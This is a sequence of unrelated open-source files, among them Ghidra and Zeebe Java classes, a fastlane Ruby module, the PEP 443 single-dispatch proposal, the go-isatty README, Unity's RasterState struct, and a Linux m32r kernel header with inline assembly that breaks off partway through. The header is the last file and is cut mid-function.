CONSTRAINT `issue_backlog_user_id` FOREIGN KEY (`user_id`) REFERENCES `user`(`id`) ON UPDATE CASCADE ON DELETE CASCADE
) ENGINE=INNODB CHARSET=utf8;
# Update version
UPDATE `config` SET `value` = '16.02.04.1' WHERE `attribute` = 'version';
| {
"pile_set_name": "Github"
} |
/* ###
* IP: GHIDRA
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package ghidra.plugins.importer.batch;
import ghidra.formats.gfilesystem.FSRL;
/**
* This class holds information regarding a single user-added source file added
* to a batch import session.
*/
public class UserAddedSourceInfo {
private final FSRL fsrl;
private int fileCount;
private int rawFileCount;
private int containerCount;
private int maxNestLevel;
private boolean recurseTerminatedEarly;
UserAddedSourceInfo(FSRL fsrl) {
this.fsrl = fsrl;
}
public int getFileCount() {
return fileCount;
}
public void setFileCount(int fileCount) {
this.fileCount = fileCount;
}
public int getRawFileCount() {
return rawFileCount;
}
public void setRawFileCount(int rawFileCount) {
this.rawFileCount = rawFileCount;
}
public void incRawFileCount() {
this.rawFileCount++;
}
public int getContainerCount() {
return containerCount;
}
public void setContainerCount(int containerCount) {
this.containerCount = containerCount;
}
public void incContainerCount() {
this.containerCount++;
}
public int getMaxNestLevel() {
return maxNestLevel;
}
public void setMaxNestLevel(int maxNestLevel) {
this.maxNestLevel = maxNestLevel;
}
public boolean wasRecurseTerminatedEarly() {
return recurseTerminatedEarly;
}
public void setRecurseTerminatedEarly(boolean recurseTerminatedEarly) {
this.recurseTerminatedEarly = recurseTerminatedEarly;
}
public FSRL getFSRL() {
return fsrl;
}
}
| {
"pile_set_name": "Github"
} |
require 'spaceship'
require_relative 'module'
module Produce
class CloudContainer
def create(options, _args)
login
container_identifier = options.container_identifier || UI.input("iCloud Container identifier: ")
if container_exists?(container_identifier)
UI.success("[DevCenter] iCloud Container '#{options.container_name} (#{options.container_identifier})' already exists, nothing to do on the Dev Center")
# Nothing to do here
else
container_name = options.container_name || container_identifier.gsub('.', ' ')
UI.success("Creating new iCloud Container '#{container_name}' with identifier '#{container_identifier}' on the Apple Dev Center")
container = Spaceship.cloud_container.create!(identifier: container_identifier, name: container_name)
if container.name != container_name
UI.important("Your container name includes non-ASCII characters, which are not supported by the Apple Developer Portal.")
UI.important("To fix this a unique (internal) name '#{container.name}' has been created for you.")
end
UI.message("Created iCloud Container #{container.cloud_container}")
UI.user_error!("Something went wrong when creating the new iCloud Container - it's not listed in the iCloud Container list") unless container_exists?(container_identifier)
UI.success("Finished creating new iCloud Container '#{container_name}' on the Dev Center")
end
return true
end
def associate(_options, args)
login
if !app_exists?
UI.message("[DevCenter] App '#{Produce.config[:app_identifier]}' does not exist, nothing to associate with the containers")
else
app = Spaceship.app.find(app_identifier)
UI.user_error!("Something went wrong when fetching the app - it's not listed in the apps list") if app.nil?
new_containers = []
UI.message("Validating containers before association")
args.each do |container_identifier|
if !container_exists?(container_identifier)
UI.message("[DevCenter] iCloud Container '#{container_identifier}' does not exist, please create it first, skipping for now")
else
new_containers.push(Spaceship.cloud_container.find(container_identifier))
end
end
UI.message("Finalising association with #{new_containers.count} containers")
app.associate_cloud_containers(new_containers)
UI.success("Done!")
end
return true
end
def login
UI.message("Starting login with user '#{Produce.config[:username]}'")
Spaceship.login(Produce.config[:username], nil)
Spaceship.select_team
UI.message("Successfully logged in")
end
def app_identifier
Produce.config[:app_identifier].to_s
end
def container_exists?(identifier)
Spaceship.cloud_container.find(identifier) != nil
end
def app_exists?
Spaceship.app.find(app_identifier) != nil
end
end
end
| {
"pile_set_name": "Github"
} |
//
// LLCollectionEmotionTip.h
// LLWeChat
//
// Created by GYJZH on 7/30/16.
// Copyright © 2016 GYJZH. All rights reserved.
//
#import <UIKit/UIKit.h>
#import "LLCollectionEmotionCell.h"
@interface LLCollectionEmojiTip : UIView
@property (nonatomic) LLCollectionEmojiCell *cell;
+ (instancetype)sharedTip;
- (void)showTipOnCell:(LLCollectionEmojiCell *)cell;
@end
@interface LLCollectionGifTip : UIView
@property (nonatomic) LLCollectionGifCell *cell;
+ (instancetype)sharedTip;
- (void)showTipOnCell:(LLCollectionGifCell *)cell;
@end | {
"pile_set_name": "Github"
} |
import { Component, OnInit } from '@angular/core';
@Component({
selector: 'register-v2',
templateUrl: './register-v2.component.html',
styleUrls: ['./register-v2.component.scss']
})
export class RegisterV2Component implements OnInit {
constructor() {}
ngOnInit() {
}
}
| {
"pile_set_name": "Github"
} |
/*
* Generated by class-dump 3.3.4 (64 bit).
*
* class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2011 by Steve Nygard.
*/
#import "NSObject.h"
#import "OCDDelayedMediaContext-Protocol.h"
@class NSURL, OCPPackage;
@interface OCXDelayedMediaContext : NSObject <OCDDelayedMediaContext>
{
OCPPackage *mPackage;
NSURL *mTargetLocation;
}
- (_Bool)saveDelayedMedia:(id)arg1 toFile:(id)arg2;
- (_Bool)loadDelayedNode:(id)arg1;
- (void)dealloc;
- (id)initWithTargetLocation:(id)arg1 package:(id)arg2;
@end
| {
"pile_set_name": "Github"
} |
namespace Api.Customers
{
public class MovieDto
{
public long Id { get; set; }
public string Name { get; set; }
}
} | {
"pile_set_name": "Github"
} |
PEP: 443
Title: Single-dispatch generic functions
Version: $Revision$
Last-Modified: $Date$
Author: Łukasz Langa <[email protected]>
Discussions-To: Python-Dev <[email protected]>
Status: Final
Type: Standards Track
Content-Type: text/x-rst
Created: 22-May-2013
Post-History: 22-May-2013, 25-May-2013, 31-May-2013
Replaces: 245, 246, 3124
Abstract
========
This PEP proposes a new mechanism in the ``functools`` standard library
module that provides a simple form of generic programming known as
single-dispatch generic functions.
A **generic function** is composed of multiple functions implementing
the same operation for different types. Which implementation should be
used during a call is determined by the dispatch algorithm. When the
implementation is chosen based on the type of a single argument, this is
known as **single dispatch**.
Rationale and Goals
===================
Python has always provided a variety of built-in and standard-library
generic functions, such as ``len()``, ``iter()``, ``pprint.pprint()``,
``copy.copy()``, and most of the functions in the ``operator`` module.
However, it currently:
1. does not have a simple or straightforward way for developers to
create new generic functions,
2. does not have a standard way for methods to be added to existing
generic functions (i.e., some are added using registration
functions, others require defining ``__special__`` methods, possibly
by monkeypatching).
In addition, it is currently a common anti-pattern for Python code to
inspect the types of received arguments, in order to decide what to do
with the objects.
For example, code may wish to accept either an object
of some type, or a sequence of objects of that type.
Currently, the "obvious way" to do this is by type inspection, but this
is brittle and closed to extension.
Abstract Base Classes make it easier
to discover present behaviour, but don't help adding new behaviour.
A developer using an already-written library may be unable to change how
their objects are treated by such code, especially if the objects they
are using were created by a third party.
Therefore, this PEP proposes a uniform API to address dynamic
overloading using decorators.
User API
========
To define a generic function, decorate it with the ``@singledispatch``
decorator. Note that the dispatch happens on the type of the first
argument. Create your function accordingly::
>>> from functools import singledispatch
>>> @singledispatch
... def fun(arg, verbose=False):
... if verbose:
... print("Let me just say,", end=" ")
... print(arg)
To add overloaded implementations to the function, use the
``register()`` attribute of the generic function. This is a decorator,
taking a type parameter and decorating a function implementing the
operation for that type::
>>> @fun.register(int)
... def _(arg, verbose=False):
... if verbose:
... print("Strength in numbers, eh?", end=" ")
... print(arg)
...
>>> @fun.register(list)
... def _(arg, verbose=False):
... if verbose:
... print("Enumerate this:")
... for i, elem in enumerate(arg):
... print(i, elem)
To enable registering lambdas and pre-existing functions, the
``register()`` attribute can be used in a functional form::
>>> def nothing(arg, verbose=False):
... print("Nothing.")
...
>>> fun.register(type(None), nothing)
The ``register()`` attribute returns the undecorated function. This
enables decorator stacking, pickling, as well as creating unit tests for
each variant independently::
>>> @fun.register(float)
... @fun.register(Decimal)
... def fun_num(arg, verbose=False):
... if verbose:
... print("Half of your number:", end=" ")
... print(arg / 2)
...
>>> fun_num is fun
False
When called, the generic function dispatches on the type of the first
argument::
>>> fun("Hello, world.")
Hello, world.
>>> fun("test.", verbose=True)
Let me just say, test.
>>> fun(42, verbose=True)
Strength in numbers, eh? 42
>>> fun(['spam', 'spam', 'eggs', 'spam'], verbose=True)
Enumerate this:
0 spam
1 spam
2 eggs
3 spam
>>> fun(None)
Nothing.
>>> fun(1.23)
0.615
Where there is no registered implementation for a specific type, its
method resolution order is used to find a more generic implementation.
The original function decorated with ``@singledispatch`` is registered
for the base ``object`` type, which means it is used if no better
implementation is found.
To check which implementation will the generic function choose for
a given type, use the ``dispatch()`` attribute::
>>> fun.dispatch(float)
<function fun_num at 0x104319058>
>>> fun.dispatch(dict) # note: default implementation
<function fun at 0x103fe0000>
To access all registered implementations, use the read-only ``registry``
attribute::
>>> fun.registry.keys()
dict_keys([<class 'NoneType'>, <class 'int'>, <class 'object'>,
<class 'decimal.Decimal'>, <class 'list'>,
<class 'float'>])
>>> fun.registry[float]
<function fun_num at 0x1035a2840>
>>> fun.registry[object]
<function fun at 0x103fe0000>
The proposed API is intentionally limited and opinionated, as to ensure
it is easy to explain and use, as well as to maintain consistency with
existing members in the ``functools`` module.
Implementation Notes
====================
The functionality described in this PEP is already implemented in the
``pkgutil`` standard library module as ``simplegeneric``. Because this
implementation is mature, the goal is to move it largely as-is. The
reference implementation is available on hg.python.org [#ref-impl]_.
The dispatch type is specified as a decorator argument. An alternative
form using function annotations was considered but its inclusion
has been rejected. As of May 2013, this usage pattern is out of scope
for the standard library [#pep-0008]_, and the best practices for
annotation usage are still debated.
Based on the current ``pkgutil.simplegeneric`` implementation, and
following the convention on registering virtual subclasses on Abstract
Base Classes, the dispatch registry will not be thread-safe.
Abstract Base Classes
---------------------
The ``pkgutil.simplegeneric`` implementation relied on several forms of
method resolution order (MRO). ``@singledispatch`` removes special
handling of old-style classes and Zope's ExtensionClasses. More
importantly, it introduces support for Abstract Base Classes (ABC).
When a generic function implementation is registered for an ABC, the
dispatch algorithm switches to an extended form of C3 linearization,
which includes the relevant ABCs in the MRO of the provided argument.
The algorithm inserts ABCs where their functionality is introduced, i.e.
``issubclass(cls, abc)`` returns ``True`` for the class itself but
returns ``False`` for all its direct base classes. Implicit ABCs for
a given class (either registered or inferred from the presence of
a special method like ``__len__()``) are inserted directly after the
last ABC explicitly listed in the MRO of said class.
In its most basic form, this linearization returns the MRO for the given
type::
>>> _compose_mro(dict, [])
[<class 'dict'>, <class 'object'>]
When the second argument contains ABCs that the specified type is
a subclass of, they are inserted in a predictable order::
>>> _compose_mro(dict, [Sized, MutableMapping, str,
... Sequence, Iterable])
[<class 'dict'>, <class 'collections.abc.MutableMapping'>,
<class 'collections.abc.Mapping'>, <class 'collections.abc.Sized'>,
<class 'collections.abc.Iterable'>, <class 'collections.abc.Container'>,
<class 'object'>]
While this mode of operation is significantly slower, all dispatch
decisions are cached. The cache is invalidated on registering new
implementations on the generic function or when user code calls
``register()`` on an ABC to implicitly subclass it. In the latter case,
it is possible to create a situation with ambiguous dispatch, for
instance::
>>> from collections import Iterable, Container
>>> class P:
... pass
>>> Iterable.register(P)
<class '__main__.P'>
>>> Container.register(P)
<class '__main__.P'>
Faced with ambiguity, ``@singledispatch`` refuses the temptation to
guess::
>>> @singledispatch
... def g(arg):
... return "base"
...
>>> g.register(Iterable, lambda arg: "iterable")
<function <lambda> at 0x108b49110>
>>> g.register(Container, lambda arg: "container")
<function <lambda> at 0x108b491c8>
>>> g(P())
Traceback (most recent call last):
...
RuntimeError: Ambiguous dispatch: <class 'collections.abc.Container'>
or <class 'collections.abc.Iterable'>
Note that this exception would not be raised if one or more ABCs had
been provided explicitly as base classes during class definition. In
this case dispatch happens in the MRO order::
>>> class Ten(Iterable, Container):
... def __iter__(self):
... for i in range(10):
... yield i
... def __contains__(self, value):
... return value in range(10)
...
>>> g(Ten())
'iterable'
A similar conflict arises when subclassing an ABC is inferred from the
presence of a special method like ``__len__()`` or ``__contains__()``::
>>> class Q:
... def __contains__(self, value):
... return False
...
>>> issubclass(Q, Container)
True
>>> Iterable.register(Q)
>>> g(Q())
Traceback (most recent call last):
...
RuntimeError: Ambiguous dispatch: <class 'collections.abc.Container'>
or <class 'collections.abc.Iterable'>
An early version of the PEP contained a custom approach that was simpler
but created a number of edge cases with surprising results [#why-c3]_.
Usage Patterns
==============
This PEP proposes extending behaviour only of functions specifically
marked as generic. Just as a base class method may be overridden by
a subclass, so too a function may be overloaded to provide custom
functionality for a given type.
Universal overloading does not equal *arbitrary* overloading, in the
sense that we need not expect people to randomly redefine the behavior
of existing functions in unpredictable ways. To the contrary, generic
function usage in actual programs tends to follow very predictable
patterns and registered implementations are highly-discoverable in the
common case.
If a module is defining a new generic operation, it will usually also
define any required implementations for existing types in the same
place. Likewise, if a module is defining a new type, then it will
usually define implementations there for any generic functions that it
knows or cares about. As a result, the vast majority of registered
implementations can be found adjacent to either the function being
overloaded, or to a newly-defined type for which the implementation is
adding support.
It is only in rather infrequent cases that one will have implementations
registered in a module that contains neither the function nor the
type(s) for which the implementation is added. In the absence of
incompetence or deliberate intention to be obscure, the few
implementations that are not registered adjacent to the relevant type(s)
or function(s), will generally not need to be understood or known about
outside the scope where those implementations are defined. (Except in
the "support modules" case, where best practice suggests naming them
accordingly.)
As mentioned earlier, single-dispatch generics are already prolific
throughout the standard library. A clean, standard way of doing them
provides a way forward to refactor those custom implementations to use
a common one, opening them up for user extensibility at the same time.
Alternative approaches
======================
In PEP 3124 [#pep-3124]_ Phillip J. Eby proposes a full-grown solution
with overloading based on arbitrary rule sets (with the default
implementation dispatching on argument types), as well as interfaces,
adaptation and method combining. PEAK-Rules [#peak-rules]_ is
a reference implementation of the concepts described in PJE's PEP.
Such a broad approach is inherently complex, which makes reaching
a consensus hard. In contrast, this PEP focuses on a single piece of
functionality that is simple to reason about. It's important to note
this does not preclude the use of other approaches now or in the future.
In a 2005 article on Artima [#artima2005]_ Guido van Rossum presents
a generic function implementation that dispatches on types of all
arguments on a function. The same approach was chosen in Andrey Popp's
``generic`` package available on PyPI [#pypi-generic]_, as well as David
Mertz's ``gnosis.magic.multimethods`` [#gnosis-multimethods]_.
While this seems desirable at first, I agree with Fredrik Lundh's
comment that "if you design APIs with pages of logic just to sort out
what code a function should execute, you should probably hand over the
API design to someone else". In other words, the single argument
approach proposed in this PEP is not only easier to implement but also
clearly communicates that dispatching on a more complex state is an
anti-pattern. It also has the virtue of corresponding directly with the
familiar method dispatch mechanism in object oriented programming. The
only difference is whether the custom implementation is associated more
closely with the data (object-oriented methods) or the algorithm
(single-dispatch overloading).
PyPy's RPython offers ``extendabletype`` [#pairtype]_, a metaclass which
enables classes to be externally extended. In combination with
``pairtype()`` and ``pair()`` factories, this offers a form of
single-dispatch generics.
Acknowledgements
================
Apart from Phillip J. Eby's work on PEP 3124 [#pep-3124]_ and
PEAK-Rules, influences include Paul Moore's original issue
[#issue-5135]_ that proposed exposing ``pkgutil.simplegeneric`` as part
of the ``functools`` API, Guido van Rossum's article on multimethods
[#artima2005]_, and discussions with Raymond Hettinger on a general
pprint rewrite. Huge thanks to Nick Coghlan for encouraging me to create
this PEP and providing initial feedback.
References
==========
.. [#ref-impl]
http://hg.python.org/features/pep-443/file/tip/Lib/functools.py#l359
.. [#pep-0008] PEP 8 states in the "Programming Recommendations"
section that "the Python standard library will not use function
annotations as that would result in a premature commitment to
a particular annotation style".
(http://www.python.org/dev/peps/pep-0008)
.. [#why-c3] http://bugs.python.org/issue18244
.. [#pep-3124] http://www.python.org/dev/peps/pep-3124/
.. [#peak-rules] http://peak.telecommunity.com/DevCenter/PEAK_2dRules
.. [#artima2005]
http://www.artima.com/weblogs/viewpost.jsp?thread=101605
.. [#pypi-generic] http://pypi.python.org/pypi/generic
.. [#gnosis-multimethods]
http://gnosis.cx/publish/programming/charming_python_b12.html
.. [#pairtype]
https://bitbucket.org/pypy/pypy/raw/default/rpython/tool/pairtype.py
.. [#issue-5135] http://bugs.python.org/issue5135
Copyright
=========
This document has been placed in the public domain.
..
Local Variables:
mode: indented-text
indent-tabs-mode: nil
sentence-end-double-space: t
fill-column: 70
coding: utf-8
End:
| {
"pile_set_name": "Github"
} |
# go-isatty
[](http://godoc.org/github.com/mattn/go-isatty)
[](https://travis-ci.org/mattn/go-isatty)
[](https://coveralls.io/github/mattn/go-isatty?branch=master)
[](https://goreportcard.com/report/mattn/go-isatty)
isatty for golang
## Usage
```go
package main
import (
"fmt"
"github.com/mattn/go-isatty"
"os"
)
func main() {
if isatty.IsTerminal(os.Stdout.Fd()) {
fmt.Println("Is Terminal")
} else if isatty.IsCygwinTerminal(os.Stdout.Fd()) {
fmt.Println("Is Cygwin/MSYS2 Terminal")
} else {
fmt.Println("Is Not Terminal")
}
}
```
## Installation
```
$ go get github.com/mattn/go-isatty
```
## License
MIT
## Author
Yasuhiro Matsumoto (a.k.a mattn)
## Thanks
* k-takata: base idea for IsCygwinTerminal
https://github.com/k-takata/go-iscygpty
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" ?>
<ExportAPERO>
<CalibrationInternConique>
<KnownConv>eConvApero_DistM2C</KnownConv>
<PP>2790.43968930248366 1874.43294208992393</PP>
<F>5590.3522889788419</F>
<SzIm>5634 3754</SzIm>
<CalibDistortion>
<ModRad>
<CDist>2801.56088525157884 1891.83459885383377</CDist>
<CoeffDist>-2.77277807738007844e-09</CoeffDist>
<CoeffDist>1.1595700887045599e-16</CoeffDist>
<CoeffDist>-6.45038082158591678e-25</CoeffDist>
</ModRad>
</CalibDistortion>
</CalibrationInternConique>
</ExportAPERO>
| {
"pile_set_name": "Github"
} |
/*
* Copyright Camunda Services GmbH and/or licensed to Camunda Services GmbH under
* one or more contributor license agreements. See the NOTICE file distributed
* with this work for additional information regarding copyright ownership.
* Licensed under the Zeebe Community License 1.0. You may not use this file
* except in compliance with the Zeebe Community License 1.0.
*/
package io.zeebe.engine.processing.deployment.model.yaml;
import com.fasterxml.jackson.annotation.JsonProperty;
public final class YamlCase {
@JsonProperty("case")
private String condition = "";
@JsonProperty("goto")
private String next = "";
@JsonProperty("default")
private String defaultCase;
public String getCondition() {
return condition;
}
public void setCondition(final String condition) {
this.condition = condition;
}
public String getNext() {
return next;
}
public void setNext(final String next) {
this.next = next;
}
public String getDefaultCase() {
return defaultCase;
}
public void setDefaultCase(final String defaultCase) {
this.defaultCase = defaultCase;
}
}
| {
"pile_set_name": "Github"
} |
console.log('bar');
| {
"pile_set_name": "Github"
} |
// Unity C# reference source
// Copyright (c) Unity Technologies. For terms of use, see
// https://unity3d.com/legal/licenses/Unity_Reference_Only_License
using System;
using System.Runtime.InteropServices;
using UnityEngine.Rendering;
namespace UnityEngine.Rendering
{
// Must match GfxRasterState on C++ side
[StructLayout(LayoutKind.Sequential)]
public struct RasterState : IEquatable<RasterState>
{
// Passing a single parameter here to force non-default constructor
public static readonly RasterState defaultValue = new RasterState(CullMode.Back);
public RasterState(
CullMode cullingMode = CullMode.Back,
int offsetUnits = 0,
float offsetFactor = 0f,
bool depthClip = true)
{
m_CullingMode = cullingMode;
m_OffsetUnits = offsetUnits;
m_OffsetFactor = offsetFactor;
m_DepthClip = Convert.ToByte(depthClip);
m_Conservative = Convert.ToByte(false);
m_Padding1 = 0;
m_Padding2 = 0;
}
public CullMode cullingMode
{
get { return m_CullingMode; }
set { m_CullingMode = value; }
}
public bool depthClip
{
get { return Convert.ToBoolean(m_DepthClip); }
set { m_DepthClip = Convert.ToByte(value); }
}
public bool conservative
{
get { return Convert.ToBoolean(m_Conservative); }
set { m_Conservative = Convert.ToByte(value); }
}
public int offsetUnits
{
get { return m_OffsetUnits; }
set { m_OffsetUnits = value; }
}
public float offsetFactor
{
get { return m_OffsetFactor; }
set { m_OffsetFactor = value; }
}
CullMode m_CullingMode;
int m_OffsetUnits;
float m_OffsetFactor;
byte m_DepthClip;
byte m_Conservative;
byte m_Padding1;
byte m_Padding2;
public bool Equals(RasterState other)
{
return m_CullingMode == other.m_CullingMode && m_OffsetUnits == other.m_OffsetUnits && m_OffsetFactor.Equals(other.m_OffsetFactor) && m_DepthClip == other.m_DepthClip && m_Conservative == other.m_Conservative;
}
public override bool Equals(object obj)
{
if (ReferenceEquals(null, obj)) return false;
return obj is RasterState && Equals((RasterState)obj);
}
public override int GetHashCode()
{
unchecked
{
var hashCode = (int)m_CullingMode;
hashCode = (hashCode * 397) ^ m_OffsetUnits;
hashCode = (hashCode * 397) ^ m_OffsetFactor.GetHashCode();
hashCode = (hashCode * 397) ^ m_DepthClip.GetHashCode();
hashCode = (hashCode * 397) ^ m_Conservative.GetHashCode();
return hashCode;
}
}
public static bool operator==(RasterState left, RasterState right)
{
return left.Equals(right);
}
public static bool operator!=(RasterState left, RasterState right)
{
return !left.Equals(right);
}
}
}
| {
"pile_set_name": "Github"
} |
#ifndef _ASM_M32R_SYSTEM_H
#define _ASM_M32R_SYSTEM_H
/*
* This file is subject to the terms and conditions of the GNU General Public
* License. See the file "COPYING" in the main directory of this archive
* for more details.
*
* Copyright (C) 2001 Hiroyuki Kondo, Hirokazu Takata, and Hitoshi Yamamoto
* Copyright (C) 2004, 2006 Hirokazu Takata <takata at linux-m32r.org>
*/
#include <linux/compiler.h>
#include <asm/assembler.h>
#ifdef __KERNEL__
/*
* switch_to(prev, next) should switch from task `prev' to `next'
* `prev' will never be the same as `next'.
*
* `next' and `prev' should be struct task_struct, but it isn't always defined
*/
#if defined(CONFIG_FRAME_POINTER) || !defined(CONFIG_SCHED_OMIT_FRAME_POINTER)
#define M32R_PUSH_FP " push fp\n"
#define M32R_POP_FP " pop fp\n"
#else
#define M32R_PUSH_FP ""
#define M32R_POP_FP ""
#endif
#define switch_to(prev, next, last) do { \
__asm__ __volatile__ ( \
" seth lr, #high(1f) \n" \
" or3 lr, lr, #low(1f) \n" \
" st lr, @%4 ; store old LR \n" \
" ld lr, @%5 ; load new LR \n" \
M32R_PUSH_FP \
" st sp, @%2 ; store old SP \n" \
" ld sp, @%3 ; load new SP \n" \
" push %1 ; store `prev' on new stack \n" \
" jmp lr \n" \
" .fillinsn \n" \
"1: \n" \
" pop %0 ; restore `__last' from new stack \n" \
M32R_POP_FP \
: "=r" (last) \
: "0" (prev), \
"r" (&(prev->thread.sp)), "r" (&(next->thread.sp)), \
"r" (&(prev->thread.lr)), "r" (&(next->thread.lr)) \
: "memory", "lr" \
); \
} while(0)
/* Interrupt Control */
#if !defined(CONFIG_CHIP_M32102) && !defined(CONFIG_CHIP_M32104)
#define local_irq_enable() \
__asm__ __volatile__ ("setpsw #0x40 -> nop": : :"memory")
#define local_irq_disable() \
__asm__ __volatile__ ("clrpsw #0x40 -> nop": : :"memory")
#else /* CONFIG_CHIP_M32102 || CONFIG_CHIP_M32104 */
static inline void local_irq_enable(void)
{
unsigned long tmpreg;
__asm__ __volatile__(
"mvfc %0, psw; \n\t"
"or3 %0, %0, #0x0040; \n\t"
"mvtc %0, psw; \n\t"
: "=&r" (tmpreg) : : "cbit", "memory");
}
static inline void local_irq_disable(void)
{
unsigned long tmpreg0, tmpreg1;
__asm__ __volatile__(
"ld24 %0, #0 ; Use 32-bit insn. \n\t"
"mvfc %1, psw ; No interrupt can be accepted here. \n\t"
"mvtc %0, psw \n\t"
"and3 %0, %1, #0xffbf \n\t"
"mvtc %0, psw \n\t"
: "=&r" (tmpreg0), "=&r" (tmpreg1) : : "cbit", "memory");
}
#endif /* CONFIG_CHIP_M32102 || CONFIG_CHIP_M32104 */
#define local_save_flags(x) \
__asm__ __volatile__("mvfc %0,psw" : "=r"(x) : /* no input */)
#define local_irq_restore(x) \
__asm__ __volatile__("mvtc %0,psw" : /* no outputs */ \
: "r" (x) : "cbit", "memory")
#if !(defined(CONFIG_CHIP_M32102) || defined(CONFIG_CHIP_M32104))
#define local_irq_save(x) \
__asm__ __volatile__( \
"mvfc %0, psw; \n\t" \
"clrpsw #0x40 -> nop; \n\t" \
: "=r" (x) : /* no input */ : "memory")
#else /* CONFIG_CHIP_M32102 || CONFIG_CHIP_M32104 */
#define local_irq_save(x) \
({ \
unsigned long tmpreg; \
__asm__ __volatile__( \
"ld24 %1, #0 \n\t" \
"mvfc %0, psw \n\t" \
"mvtc %1, psw \n\t" \
"and3 %1, %0, #0xffbf \n\t" \
"mvtc %1, psw \n\t" \
: "=r" (x), "=&r" (tmpreg) \
: : "cbit", "memory"); \
})
#endif /* CONFIG_CHIP_M32102 || CONFIG_CHIP_M32104 */
#define irqs_disabled() \
({ \
unsigned long flags; \
local_save_flags(flags); \
!(flags & 0x40); \
})
#define nop() __asm__ __volatile__ ("nop" : : )
#define xchg(ptr, x) \
((__typeof__(*(ptr)))__xchg((unsigned long)(x), (ptr), sizeof(*(ptr))))
#define xchg_local(ptr, x) \
((__typeof__(*(ptr)))__xchg_local((unsigned long)(x), (ptr), \
sizeof(*(ptr))))
extern void __xchg_called_with_bad_pointer(void);
#ifdef CONFIG_CHIP_M32700_TS1
#define DCACHE_CLEAR(reg0, reg1, addr) \
"seth "reg1", #high(dcache_dummy); \n\t" \
"or3 "reg1", "reg1", #low(dcache_dummy); \n\t" \
"lock "reg0", @"reg1"; \n\t" \
"add3 "reg0", "addr", #0x1000; \n\t" \
"ld "reg0", @"reg0"; \n\t" \
"add3 "reg0", "addr", #0x2000; \n\t" \
"ld "reg0", @"reg0"; \n\t" \
"unlock "reg0", @"reg1"; \n\t"
#else /* CONFIG_CHIP_M32700_TS1 */
#define DCACHE_CLEAR(reg0, reg1, addr)
#endif /* CONFIG_CHIP_M32700_TS1 */
static __always_inline unsigned long
__xchg(unsigned long x, volatile void *ptr, int size)
{
unsigned long flags;
unsigned long tmp = 0;
local_irq_save(flags);
switch (size) {
#ifndef CONFIG_SMP
case 1:
__asm__ __volatile__ (
"ldb %0, @%2 \n\t"
"stb %1, @%2 \n\t"
: "=&r" (tmp) : "r" (x), "r" (ptr) : "memory");
break;
case 2:
__asm__ __volatile__ (
"ldh %0, @%2 \n\t"
"sth %1, @%2 \n\t"
: "=&r" (tmp) : "r" (x), "r" (ptr) : "memory");
break;
case 4:
__asm__ __volatile__ (
"ld %0, @%2 \n\t"
"st %1, @%2 \n\t"
: "=&r" (tmp) : "r" (x), "r" (ptr) : "memory");
break;
#else /* CONFIG_SMP */
case 4:
__asm__ __volatile__ (
DCACHE_CLEAR("%0", "r4", "%2")
"lock %0, @%2; \n\t"
"unlock %1, @%2; \n\t"
: "=&r" (tmp) : "r" (x), "r" (ptr)
: "memory"
#ifdef CONFIG_CHIP_M32700_TS1
, "r4"
#endif /* CONFIG_CHIP_M32700_TS1 */
);
break;
#endif /* CONFIG_SMP */
default:
__xchg_called_with_bad_pointer();
}
local_irq_restore(flags);
return (tmp);
}
static __always_inline unsigned long
__xchg_local(unsigned long x, volatile void *ptr, int size)
{
unsigned long flags;
unsigned long tmp = 0;
local_irq_save(flags);
switch (size) {
case 1:
__asm__ __volatile__ (
"ldb %0, @%2 \n\t"
"stb %1, @%2 \n\t"
: "=&r" (tmp) : "r" (x), "r" (ptr) : "memory");
break;
case 2:
__asm__ __volatile__ (
"ldh %0, @%2 \n\t"
"sth %1, @%2 \n\t"
: "=&r" (tmp) : "r" (x), "r" (ptr) : "memory");
break;
case 4:
__asm__ __volatile__ (
"ld %0, @%2 \n\t"
"st %1, @%2 \n\t"
: "=&r" (tmp) : "r" (x), "r" (ptr) : "memory");
break;
default:
__xchg_called_with_bad_pointer();
}
local_irq_restore(flags);
return (tmp);
}
#define __HAVE_ARCH_CMPXCHG 1
static inline unsigned long
__cmpxchg_u32(volatile unsigned int *p, unsigned int old, unsigned int new)
{
unsigned long flags;
unsigned int retval;
local_irq_save(flags);
__asm__ __volatile__ (
DCACHE_CLEAR("%0", "r4", "%1")
M32R_LOCK" %0, @%1; \n"
" bne %0, %2, 1f; \n"
M32R_UNLOCK" %3, @%1; \n"
" bra 2f; \n"
" .fillinsn \n"
"1:"
M32R_UNLOCK" %0, @%1; \n"
" .fillinsn \n"
"2:"
: "=&r" (retval)
: "r" (p), "r" (old), "r" (new)
: "cbit", "memory"
#ifdef CONFIG_CHIP_M32700_TS1
, "r4"
#endif /* CONFIG_CHIP_M32700_TS1 */
);
local_irq_restore(flags);
return retval;
}
static inline unsigned long
__cmpxchg_local_u32(volatile unsigned int *p, unsigned int old,
unsigned int new)
{
unsigned long flags;
unsigned int retval;
local_irq_save(flags);
__asm__ __volatile__ (
DCACHE_CLEAR("%0", "r4", "%1")
"ld %0, @%1; \n"
" bne %0, %2, 1f; \n"
"st %3, @%1; \n"
" bra 2f; \n"
" .fillinsn \n"
"1:"
"st %0, @%1; \n"
" .fillinsn \n"
"2:"
: "=&r" (retval)
: "r" (p), "r" (old), "r" (new)
: "cbit", "memory"
#ifdef CONFIG_CHIP_M32700_TS1
, "r4"
#endif /* CONFIG_CHIP_M32700_TS1 */
);
local_irq_restore(flags);
return retval;
}
/* This function doesn't exist, so you'll get a linker error
if something tries to do an invalid cmpxchg(). */
extern void __cmpxchg_called_with_bad_pointer(void);
static inline unsigned long
__cmpxchg(volatile void *ptr, unsigned long old, unsigned long new, int size)
{
switch (size) {
case 4:
return __cmpxchg_u32(ptr, old, new);
}
__cmpxchg_called_with_bad_pointer();
return old;
}
#define cmpxchg(ptr, o, n) \
((__typeof__(*(ptr))) __cmpxchg((ptr), (unsigned long)(o), \
(unsigned long)(n), sizeof(*(ptr))))
#include <asm-generic/cmpxchg-local.h>
static inline unsigned long __cmpxchg_local(volatile void *ptr,
unsigned long old,
unsigned long new, int size)
{
switch (size) {
case 4:
return __cmpxchg_local_u32(ptr, old, new);
default:
return __cmpxchg_local_generic(ptr, old, new, size);
